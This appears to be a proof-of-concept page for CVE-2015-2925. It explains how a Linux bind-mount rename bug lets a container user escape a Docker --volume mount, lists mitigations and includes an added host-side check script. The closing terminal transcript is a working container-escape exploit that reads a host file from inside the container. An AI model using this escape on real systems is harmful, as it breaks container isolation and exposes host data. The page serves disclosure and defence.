
CVE-2015-2925 PoC: Linux kernel permission and access control vulnerability

Source
Related vulnerability
Title: Linux kernel permission and access control vulnerability (CVE-2015-2925)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation in the United States. The NFSv4 implementation is one of its distributed file system protocols. The 'prepend_path' function in fs/dcache.c in Linux kernel 4.2.3 and earlier has a security vulnerability caused by the program not correctly handling rename operations across bind mounts. A local attacker can exploit this vulnerability by renaming a directory to bypass the intended container isolation.
Description
Docker + CVE-2015-2925 = escaping from --volume
Introduction
# Docker + CVE-2015-2925 = escaping from --volume

A [recent vulnerability in Linux](http://www.openwall.com/lists/oss-security/2015/04/03/7), known for about half a year (several months publicly), makes it possible to escape from bind mounts. In particular, in the case of Docker it is possible to escape from inside a directory mounted via the `--volume` option into the corresponding host filesystem.

The Docker Security Team [is already aware](http://www.openwall.com/lists/oss-security/2015/05/07/10) of the issue and has allowed this to be published in order to attract public attention.

Thanks to [Jann Horn](https://github.com/thejh) for pointing this out; basically I just reproduced it.

## Mitigation

Any one of these is sufficient:

* AppArmor-enabled kernel and AppArmor Docker profile
* SELinux-enabled kernel and SELinux Docker policy
* Disabled user namespaces in kernel
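
Added here as a host-side check, not part of the original PoC or of Docker's tooling: a POSIX sh script that reads the kernel config and the AppArmor and SELinux state files (standard locations assumed) and reports whether at least one of the mitigations above is in place. The decision logic is kept separate from the live collection so it can be exercised against constructed inputs.

```shell
#!/bin/sh
# Added host-side mitigation check for CVE-2015-2925 (not from the original
# PoC). Assumed interfaces: /proc/config.gz or /boot/config-$(uname -r) for the
# kernel config, /sys/module/apparmor/parameters/enabled (Y/N) for AppArmor,
# /sys/fs/selinux/enforce (1/0) for SELinux.

# userns_from_config CONFIG_TEXT -> prints y if CONFIG_USER_NS=y, else n
userns_from_config() {
  if printf '%s\n' "$1" | grep -qx 'CONFIG_USER_NS=y'; then echo y; else echo n; fi
}

# assess USERNS APPARMOR SELINUX -> prints a verdict, returns 0 if any of the
# three mitigations listed above is present, 1 if the host is exposed.
#   USERNS   y/n  kernel built with CONFIG_USER_NS
#   APPARMOR Y/N  AppArmor enabled in the kernel
#   SELINUX  1/0  SELinux in enforcing mode
assess() {
  if [ "$1" = "n" ]; then
    echo "mitigated: user namespaces disabled, unprivileged unshare -U fails"
    return 0
  fi
  if [ "$2" = "Y" ]; then
    echo "mitigated: AppArmor enabled (confirm the Docker profile is loaded)"
    return 0
  fi
  if [ "$3" = "1" ]; then
    echo "mitigated: SELinux enforcing (confirm the Docker policy is loaded)"
    return 0
  fi
  echo "exposed: user namespaces on, no MAC; bind-mount escape is possible"
  return 1
}

# collect_live -> gathers the three observations from the running host
collect_live() {
  cfg=$(zcat /proc/config.gz 2>/dev/null || cat "/boot/config-$(uname -r)" 2>/dev/null)
  if [ -z "$cfg" ]; then echo "unknown: kernel config not readable"; return 2; fi
  aa=$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null || echo N)
  se=$(cat /sys/fs/selinux/enforce 2>/dev/null || echo 0)
  assess "$(userns_from_config "$cfg")" "$aa" "$se"
}

# Run the live check only when invoked with --live (so the file can be sourced).
if [ "${1:-}" = "--live" ]; then collect_live; fi
```

Run it as `sh check.sh --live` on the Docker host; an "exposed" verdict means the PoC below can be expected to work unless one of the listed mitigations is added.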

## Notes

* This is not yet fixed upstream or in distros and should work on any recent kernel
* This doesn't require root inside the container
* Distros provide different versions of the util-linux package, which unshare(1) is part of, and it might return "Operation not permitted" in your case; the package from Debian Jessie was tested to work as expected

## Proof of concept

```
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
```